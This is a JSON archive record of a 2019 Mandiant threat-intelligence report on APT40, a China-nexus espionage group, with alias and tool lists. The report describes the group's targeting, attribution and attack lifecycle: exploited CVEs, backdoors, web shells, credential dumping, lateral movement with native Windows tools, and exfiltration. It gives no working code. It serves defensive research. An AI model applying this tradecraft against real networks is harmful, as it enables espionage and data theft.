{ "id": "7c43625e-1123-422d-9688-06fa846e2ee6", "created_at": "2026-04-06T00:10:05.093984Z", "updated_at": "2026-04-10T13:11:38.743458Z", "deleted_at": null, "sha1_hash": "dfff56f62bd7c79fa154711302746dae9d5ca7d8", "title": "APT40 | Examining a China-Nexus Espionage Actor | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1132422, "plain_text": "APT40 | Examining a China-Nexus Espionage Actor | Mandiant\r\nBy Mandiant\r\nPublished: 2019-03-04 · Archived: 2026-04-05 15:12:36 UTC\r\nWritten by: Fred Plan, Nalani Fraser, Jacqueline O'Leary, Vincent Cannon, Ben Read\r\nFireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence\r\ntargets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least\r\n2013 in support of China’s naval modernization effort. The group has specifically targeted engineering,\r\ntransportation, and the defense industry, especially where these sectors overlap with maritime technologies. More\r\nrecently, we have also observed specific targeting of countries strategically important to the Belt and Road\r\nInitiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia,\r\nSwitzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously\r\nreported as TEMP.Periscope and TEMP.Jumper.\r\nMission\r\nIn December 2016, China’s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater\r\nvehicle (UUV) operating in the South China Sea. The incident paralleled China’s actions in cyberspace; within a\r\nyear APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval\r\nresearch. That incident was one of many carried out to acquire advanced technology to support the development of\r\nChinese naval capabilities. We believe APT40’s emphasis on maritime issues and naval technology ultimately\r\nsupport China’s ambition to establish a blue-water navy.\r\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence\r\ntargets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most\r\nrecently, this has included victims with connections to elections in Southeast Asia, which is likely driven by events\r\naffecting China’s Belt and Road Initiative. China’s “One Belt, One Road” (一带一路) or “Belt and Road\r\nInitiative” (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the\r\nMiddle East, and Africa to develop a trade network that will project China’s influence across the greater region.\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 1 of 5\n\nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway,\r\nGermany, Saudi Arabia, Cambodia and Indonesia\r\nAttribution\r\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The\r\nactor’s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the\r\nactor is based in China. Analysis of the operational times of the group’s activities indicates that it is probably\r\ncentered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains\r\nwere initially registered by China based domain resellers and had Whois records with Chinese location\r\ninformation, suggesting a China based infrastructure procurement process.\r\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one\r\ninstance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in\r\nHainan, China had been used to administer the command and control node that was communicating with malware\r\non victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.\r\nAttack Lifecycle\r\nInitial Compromise\r\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server\r\nexploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web\r\ncompromises.\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 2 of 5\n\nAPT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a\r\nweb shell can provide continued access to victims' environments, re-infect victim systems, and facilitate\r\nlateral movement.\r\nThe operation’s spear-phishing emails typically leverage malicious attachments, although Google Drive\r\nlinks have also been observed.\r\nAPT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of\r\ntheir disclosure. Observed vulnerabilities include:\r\nCVE-2012-0158\r\nCVE-2017-0199\r\nCVE-2017-8759\r\nCVE-2017-11882\r\nFigure 2: APT40 attack lifecycle\r\nEstablish Foothold\r\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or\r\nused by other threat groups. In some cases, the group has used executables with code signing certificates to avoid\r\ndetection.\r\nFirst-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other\r\npayloads.\r\nPHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by\r\nAPT40.\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 3 of 5\n\nAPT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted\r\nenvironment. This methodology proves to be ideal as once these credentials are obtained, they may not\r\nneed to rely as heavily on malware to continue the mission.\r\nEscalate Privileges\r\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump\r\npassword hashes.\r\nAPT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used\r\nalongside the AIRBREAK and BADFLICK backdoors.\r\nAdditionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are\r\nbelieved to be used during intrusions as well.\r\nInternal Reconnaissance\r\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The\r\ngroup also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows\r\ncapabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\r\nAPT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct\r\nnetwork enumeration.\r\nAPT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of\r\na victim’s environment.\r\nWeb shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often\r\nnot configured with the same security controls as public-facing counterparts, making them more vulnerable\r\nto exploitation by APT40 and similarly sophisticated groups.\r\nLateral Movement\r\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web\r\nshells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the\r\ngroup usually executes malware, performs additional reconnaissance, and steals data.\r\nAPT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network\r\nresources management tool) for lateral movement.\r\nPublicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\r\nAlthough MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral\r\nmovement.\r\nAPT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack\r\ndifferent protocols and services.\r\nMaintain Presence\r\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These\r\ntools enable continued control of key systems in the targeted network.\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 4 of 5\n\nAPT40 strongly favors web shells for maintaining presence, especially publicly available tools.\r\nTools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase;\r\nthis includes AIRBREAK and PHOTO.\r\nSome APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such\r\nas GitHub, Google, and Pastebin for initial C2 communications.\r\nCommon TCP ports 80 and 443 are used to blend in with routine network traffic.\r\nComplete Mission\r\nCompleting missions typically involves gathering and transferring information out of the target network, which\r\nmay involve moving files through multiple systems before reaching the destination. APT40 has been observed\r\nconsolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the\r\ndata before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the\r\neffectiveness of their data targeting and theft.\r\nOutlook and Implications\r\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular\r\ntempo, and we anticipate their operations will continue through at least the near and medium term. Based on\r\nAPT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s\r\nfuture targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road\r\nInitiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by\r\nAPT40 which extends against the project’s regional opponents.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MISPGALAXY", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html" ], "report_names": [ "apt40-examining-a-china-nexus-espionage-actor.html" ], "threat_actors": [ { "id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea", "created_at": "2023-01-06T13:46:38.745572Z", "updated_at": "2026-04-10T02:00:03.086207Z", "deleted_at": null, "main_name": "APT40", "aliases": [ "ATK29", "Red Ladon", "MUDCARP", "ISLANDDREAMS", "TEMP.Periscope", "KRYPTONITE PANDA", "G0065", "TA423", "ITG09", "Gingham Typhoon", "TEMP.Jumper", "BRONZE MOHAWK", "GADOLINIUM" ], "source_name": "MISPGALAXY:APT40", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "83025f5e-302e-46b0-baf6-650a4d313dfc", "created_at": "2024-05-01T02:03:07.971863Z", "updated_at": "2026-04-10T02:00:03.743131Z", "deleted_at": null, "main_name": "BRONZE MOHAWK", "aliases": [ "APT40 ", "GADOLINIUM ", "Gingham Typhoon ", "Kryptonite Panda ", "Leviathan ", "Nanhaishu ", "Pickleworm ", "Red Ladon ", "TA423 ", "Temp.Jumper ", "Temp.Periscope " ], "source_name": "Secureworks:BRONZE MOHAWK", "tools": [ "AIRBREAK", "BlackCoffee", "China Chopper", "Cobalt Strike", "DadJoke", "Donut", "FUSIONBLAZE", "GreenCrash", "Meterpreter", "Nanhaishu", "Orz", "SeDll" ], "source_id": "Secureworks", "reports": null }, { "id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a", "created_at": "2022-10-25T15:50:23.481057Z", "updated_at": "2026-04-10T02:00:05.306469Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon" ], "source_name": "MITRE:Leviathan", "tools": [ "Windows Credential Editor", "BITSAdmin", "HOMEFRY", "Derusbi", "at", "BLACKCOFFEE", "BADFLICK", "gh0st RAT", "PowerSploit", "MURKYTOP", "NanHaiShu", "Orz", "Cobalt Strike", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "b9806584-4d82-4f32-ae97-18a2583e8d11", "created_at": "2022-10-25T16:07:23.787833Z", "updated_at": "2026-04-10T02:00:04.749709Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "APT 40", "ATK 29", "Bronze Mohawk", "G0065", "Gadolinium", "Gingham Typhoon", "ISLANDDREAMS", "ITG09", "Jumper Taurus", "Kryptonite Panda", "Mudcarp", "Red Ladon", "TA423", "TEMP.Jumper", "TEMP.Periscope" ], "source_name": "ETDA:Leviathan", "tools": [ "AIRBREAK", "Agent.dhwf", "Agentemis", "AngryRebel", "BADFLICK", "BlackCoffee", "CHINACHOPPER", "China Chopper", "Cobalt Strike", "CobaltStrike", "DADJOKE", "Dadstache", "Derusbi", "Destroy RAT", "DestroyRAT", "Farfli", "GRILLMARK", "Gh0st RAT", "Ghost RAT", "HOMEFRY", "Hellsing Backdoor", "Kaba", "Korplug", "LOLBAS", "LOLBins", "LUNCHMONEY", "Living off the Land", "MURKYTOP", "Moudour", "Mydoor", "NanHaiShu", "Orz", "PCRat", "PNGRAT", "PlugX", "RedDelta", "SeDLL", "Sensocode", "SinoChopper", "Sogu", "TIGERPLUG", "TVT", "Thoper", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "ZoxPNG", "cobeacon", "gresim", "scanbox" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434205, "ts_updated_at": 1775826698, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.pdf", "text": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.txt", "img": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.jpg" } }